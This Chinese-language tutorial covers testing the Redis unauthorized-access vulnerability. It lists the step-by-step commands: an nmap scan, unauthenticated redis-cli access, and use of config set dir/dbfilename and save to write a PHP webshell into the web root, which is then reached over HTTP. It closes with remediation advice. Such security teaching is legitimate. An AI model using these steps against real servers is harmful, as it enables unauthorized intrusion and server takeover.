Web安全:Redis 未授权访问漏洞 测试.

Redis 默认情况下绑定在 6379 端口,然后如果没有进行添加防火墙规则避免其他非信任来源 IP 访问等相关安全策略,直接暴露在公网上。然后再没有设置密码或者设置了弱密码,因此导致此漏洞的产生.

目录:

Web安全:Redis 未授权访问漏洞 测试.

Redis 未授权访问漏洞的 危害:

Redis 未授权访问漏洞 测试:

第一步:使用 nmap 工具进行端口扫描.

第二步:查看是否可以连接 Redis 和 获取敏感信息.

第三步:利用 Redis 未授权漏洞上传 程序(木马)

第四步:访问 上传的程序(木马)

第五步:利用 上传的程序(木马)进行连接服务器获取控制权.

Redis 未授权访问漏洞 修复方法:

Redis 未授权访问漏洞的 危害:

黑客可以通过数据备份功能往磁盘写入后门文件

黑客无需认证就可以访问到内部数据,可能导致敏感信息泄露.

然后在 Redis 以 root 身份运行的话,攻击者可以给root账户写入SSH公钥文件,再直接SSH登录目标服务器.

Redis 未授权访问漏洞 测试:

第一步:使用 nmap 工具进行端口扫描.

nmap 服务器IP -p 查看的端口

nmap 192.168.0.101 -p 6379 //扫描 6379 端口是否开放.

第二步:查看是否可以连接 Redis 和 获取敏感信息.

sudo redis-cli -h 192.168.0.101 //连接 Redis 数据库.

info //查看 敏感 信息.

第三步:利用 Redis 未授权漏洞上传 程序(木马)

config set dir /var/www/html //在网站的根目录/var/www/html下写进去一个脚本.

config set dbfilename bgxg.php //脚本名称为 bgxg.php

set webshell "" // 脚本内容" 中 "的内容.

save // 保存 刚刚写入的信息.

第四步:访问 上传的程序(木马)

http://192.168.0.101/bgxg.php // bgxg.php 是刚刚写入的木马文件

bgxg=phpinfo(); // phpinfo(); 查看服务器的信息.

第五步:利用 上传的程序(木马)进行连接服务器获取控制权.

Redis 未授权访问漏洞 修复方法:

(1)Redis 添加密码验证.

(2)禁止外网访问 Redis 端口服务.

(3)修改 Redis 服务 默认端口.

    

     

      

查看原文